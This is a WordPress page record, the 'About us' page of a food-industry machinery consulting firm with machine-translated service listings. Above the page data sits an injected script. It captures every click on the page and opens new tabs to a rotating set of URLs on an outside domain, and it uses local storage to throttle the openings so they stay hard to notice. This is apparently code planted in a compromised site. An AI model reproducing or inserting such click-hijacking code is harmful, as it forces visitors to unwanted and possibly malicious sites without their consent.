<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":74,"date":"2017-07-04T16:09:15","date_gmt":"2017-07-04T11:39:15","guid":{"rendered":"http:\/\/khanichap.ir\/en\/?page_id=74"},"modified":"2017-08-02T16:35:09","modified_gmt":"2017-08-02T12:05:09","slug":"about-us","status":"publish","type":"page","link":"http:\/\/saeed-moshaver.com\/en\/about-us\/","title":{"rendered":"About us"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_column section_text_color=&#8221;dark&#8221; text_align=&#8221;center&#8221;][\/vc_column]<div class=\"porto-carousel owl-carousel  stage-margin\" data-appear-animation=\"bounce\" data-plugin-options=\"{&quot;stagePadding&quot;:40,&quot;margin&quot;:10,&quot;autoplay&quot;:&quot;yes&quot;,&quot;autoplayTimeout&quot;:2000,&quot;autoplayHoverPause&quot;:false,&quot;items&quot;:4,&quot;lg&quot;:4,&quot;md&quot;:3,&quot;sm&quot;:2,&quot;xs&quot;:1,&quot;nav&quot;:false,&quot;dots&quot;:false,&quot;animateIn&quot;:&quot;bounce&quot;,&quot;animateOut&quot;:&quot;bounce&quot;,&quot;loop&quot;:&quot;yes&quot;,&quot;center&quot;:&quot;yes&quot;,&quot;video&quot;:false,&quot;lazyLoad&quot;:&quot;yes&quot;,&quot;merge&quot;:true}\">[vc_single_image image=&#8221;162&#8243; img_size=&#8221;&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_border&#8221; onclick=&#8221;link_image&#8221; css_animation=&#8221;appear&#8221;][vc_single_image image=&#8221;145&#8243; img_size=&#8221;150*110&#8243; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_border&#8221; onclick=&#8221;link_image&#8221; css_animation=&#8221;appear&#8221;][vc_single_image image=&#8221;128&#8243; img_size=&#8221;&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_border&#8221; onclick=&#8221;link_image&#8221; css_animation=&#8221;appear&#8221;][vc_single_image image=&#8221;125&#8243; img_size=&#8221;&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_border&#8221; onclick=&#8221;link_image&#8221; css_animation=&#8221;appear&#8221;][vc_single_image image=&#8221;117&#8243; img_size=&#8221;150*110&#8243; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_border&#8221; onclick=&#8221;link_image&#8221; css_animation=&#8221;appear&#8221;]<\/div>[vc_row][\/vc_row][vc_column][vc_column_text]<\/p>\n<div class=\"tm-article-content\">\n<div id=\"gt-res-content\">\n<div id=\"gt-res-dir-ctr\" class=\"trans-verified-button-small\" dir=\"ltr\">\n<div id=\"tts_button\"><span id=\"result_box\" class=\"\" lang=\"en\">Saeed Consulting (G.M.B.H) is proud to have taken important steps in the food industry for its customers, including the presentation of the world&#8217;s most up-to-date appliances for healthy food production.<\/span><\/div>\n<\/div>\n<\/div>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span title=\"\u0627\u0632 \u0622\u0646\u062c\u0627 \u06a9\u0647 \u0634\u0631\u06a9\u062a \u0645\u0627 \u062f\u0631 \u06a9\u0634\u0648\u0631 \u0622\u0644\u0645\u0627\u0646 \u0641\u0639\u0627\u0644\u06cc\u062a \u062f\u0627\u0631\u062f\u060c\u0646\u0645\u0627\u06cc\u0646\u062f\u06af\u06cc \u0628\u0647\u062a\u0631\u06cc\u0646 \u0628\u0631\u0646\u062f \u0647\u0627\u06cc \u0633\u0627\u062e\u062a \u062f\u0633\u062a\u06af\u0627\u0647\u0647\u0627\u06cc \u0635\u0646\u0627\u06cc\u0639 \u063a\u0630\u0627\u06cc\u06cc \u0648 \u0641\u0631\u0627\u0648\u0631\u062f\u0647 \u0647\u0627\u06cc \u06af\u0648\u0634\u062a\u06cc \u0631\u0627 \u062f\u0627\u0631\u0627 \u0645\u06cc \u0628\u0627\u0634\u062f(\u06a9\u0627\u062a\u0627\u0644\u0648\u06af \u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a \u0645\u0639\u0631\u0641 \u0627\u06cc\u0646 \u0628\u0631\u0646\u062f \u0647\u0627 \u0645\u06cc \u0628\u0627\u0634\u062f).\">Since our company operates in Germany, it represents the best brands in the manufacturing of food industry and meat products (the catalog of these companies represents these brands). <\/span><span title=\"\u0634\u0631\u06a9\u062a\u0647\u0627\u06cc \u0645\u0648\u0631\u062f \u0627\u0634\u0627\u0631\u0647 \u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0633\u0627\u062e\u062a \u0627\u0631\u0627\u0626\u0647 \u062f\u0647\u0646\u062f\u0647 \u0628\u0647\u062a\u0631\u06cc\u0646 \u062a\u06a9\u0646\u0648\u0644\u0648\u0698\u06cc \u0647\u0627 \u062f\u0631 \u062c\u0647\u062a \u0628\u0647\u0628\u0648\u062f \u0631\u0648\u0646\u062f \u062a\u0648\u0644\u06cc\u062f \u0645\u06cc \u0628\u0627\u0634\u062f.\">The companies mentioned above, in addition to producing the best technologies, are intended to improve the production process. <\/span><span title=\"\u0647\u0645\u0686\u0646\u06cc\u0646 \u062f\u0631 \u0635\u0648\u0631\u062a \u062f\u0631 \u062e\u0648\u0627\u0633\u062a \u062e\u0631\u06cc\u062f \u0645\u0627\u0634\u06cc\u0646 \u0622\u0644\u0627\u062a \u062f\u0633\u062a \u062f\u0648\u0645 \u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a \u0645\u06cc\u062a\u0648\u0627\u0646\u062f \u06a9\u0644\u06cc\u0647 \u062e\u0637 \u062a\u0648\u0644\u06cc\u062f \u0641\u0631\u0627\u0648\u0631\u062f\u0647 \u0647\u0627\u06cc \u06af\u0648\u0634\u062a\u06cc \u0648 \u0633\u0628\u0632\u06cc\u062c\u0627\u062a \u0631\u0627 \u0628\u0647 \u0635\u0648\u0631\u062a \u062a\u0639\u0645\u06cc\u0631 \u0627\u0633\u0627\u0633\u06cc \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u0645\u062a\u062e\u0635\u0635\u06cc\u0646 \u0627\u0631\u0648\u067e\u0627\u06cc\u06cc \u0648 \u06af\u0627\u0631\u0627\u0646\u062a\u06cc \u062f\u0627\u0631 \u062a\u062d\u0648\u06cc\u0644 \u062e\u0631\u06cc\u062f\u0627\u0631\u0627\u0646 \u0645\u062d\u062a\u0631\u0645 \u0646\u0645\u0627\u06cc\u062f.\">Also, in case of a request for the purchase of second-hand machines, the company can reciprocate the entire line of meat and vegetable production as a major repair by European and professional guarantors. <\/span><span title=\"\u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a \u0628\u0647 \u062c\u0631\u0627\u062a \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0627\u0639\u0644\u0627\u0645 \u0646\u0645\u0627\u06cc\u062f \u06a9\u0647 \u0645\u0634\u062a\u0631\u06cc\u0627\u0646 \u0632\u06cc\u0627\u062f\u06cc \u062f\u0631 \u0627\u0642\u0635\u06cc \u0646\u0642\u0627\u0637 \u0627\u06cc\u0631\u0627\u0646 \u0628\u0631\u0627\u06cc \u062a\u0627\u06cc\u06cc\u062f \u0627\u0645\u0648\u0631 \u0641\u0631\u0648\u0634 \u0648 \u062e\u062f\u0645\u0627\u062a \u062f\u0647\u06cc \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u0646\u062f \u06a9\u0647 \u062f\u0631 \u0635\u0648\u0631\u062a \u062a\u0645\u0627\u06cc\u0644 \u0645\u06cc \u062a\u0648\u0627\u0646 \u0628\u0627 \u0622\u0646 \u0634\u0631\u06a9\u062a \u0647\u0627 \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0631\u0642\u0631\u0627\u0631 \u06a9\u0631\u062f\u0647 \u0648 \u0635\u062d\u062a \u0622\u0646 \u0631\u0627 \u062c\u0648\u06cc\u0627 \u0634\u0648\u06cc\u062f.\">The company can safely announce that there are many customers around the country to confirm sales and service that you can contact with those companies if you want to be contacted and correct.<\/span><\/span><\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">The company provides services in various parts of the service, which briefly refers to several items:<\/span><\/span><\/p>\n<div id=\"gt-res-content\">\n<div id=\"gt-res-dir-ctr\" class=\"trans-verified-button-large\" dir=\"ltr\">\n<div id=\"tts_button\"><strong><span id=\"result_box\" class=\"short_text\" lang=\"en\" style=\"color: #ff0000;\">1. red and white meat<\/span><\/strong><\/div>\n<\/div>\n<\/div>\n<div id=\"gt-res-content\">\n<div id=\"gt-res-dir-ctr\" class=\"trans-verified-button-small\" dir=\"ltr\">\n<div id=\"tts_button\"><\/div>\n<p><span id=\"result_box\" class=\"\" lang=\"en\">1-1 Consulting in the field of setting up the production unit, the production phase of the product and presenting it to the consumer market<\/span><\/p>\n<\/div>\n<\/div>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">1-2 import of industrial machinery in the production of the above products such as:Slaughter lines<\/span><\/span><\/p>\n<ul>\n<li style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">Minced meat lines<\/span><\/span><\/li>\n<li style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">Scissor-weighing machines-Automatic transients-Line-type transducers<\/span><\/span><\/li>\n<li style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">Packaging machines<\/span><\/span><\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">1.3 Increase Product Lifecycle to New and World-Defined Standards<\/span><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #ff0000;\"><strong><span id=\"result_box\" class=\"short_text\" lang=\"en\"><span class=\"\">2-Vegetables<\/span><\/span><\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\">2.1 Providing advice in the field of launching up the stage of production and delivering it to the consumer market<\/span><\/p>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">2.2 Importing industrial machines in the production and packaging of vegetables and increasing the shelf-life of the product as a universal standard.<\/span><\/span><\/p>\n<p style=\"text-align: justify;\"><strong><span id=\"result_box\" class=\"short_text\" lang=\"en\" style=\"color: #ff0000;\"><span class=\"\">3. Ready and semi-prepared foods<\/span><\/span><\/strong><\/p>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">3.1 Consulting in the field of setting up production and packaging lines for nuggets, snails, chicken, fish and meat<\/span><\/span><\/p>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">3.2 Import of machinery related to the production and packaging of the listed items<\/span><\/span><\/p>\n<div id=\"gt-res-content\">\n<div id=\"gt-res-dir-ctr\" class=\"trans-verified-button-large\" dir=\"ltr\"><span id=\"result_box\" class=\"short_text\" lang=\"en\">3-3 sausages, burgers, mayonnaise<\/span><\/div>\n<\/div>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">Therefore, the company hopes to encourage our customers to buy from the best brands of the world and to be able to cooperate well with the respectable manufacturers. In order to get a closer look at the technologies of this industry, please follow the instructions to attend our meeting.<\/span> <span class=\"\">Thank you.<\/span><\/span><\/p>\n<\/div>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/12&#8243;][\/vc_column]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_column section_text_color=&#8221;dark&#8221; text_align=&#8221;center&#8221;][\/vc_column][vc_row][\/vc_row][vc_column][vc_column_text] Saeed Consulting (G.M.B.H) is proud to have taken important steps in the food industry for its customers, including the presentation of the world&#8217;s most up-to-date appliances for healthy food production. Since our company operates in Germany, it represents the best brands in the manufacturing of food industry and meat products (the catalog [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages\/74"}],"collection":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/comments?post=74"}],"version-history":[{"count":18,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages\/74\/revisions"}],"predecessor-version":[{"id":389,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages\/74\/revisions\/389"}],"wp:attachment":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/media?parent=74"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}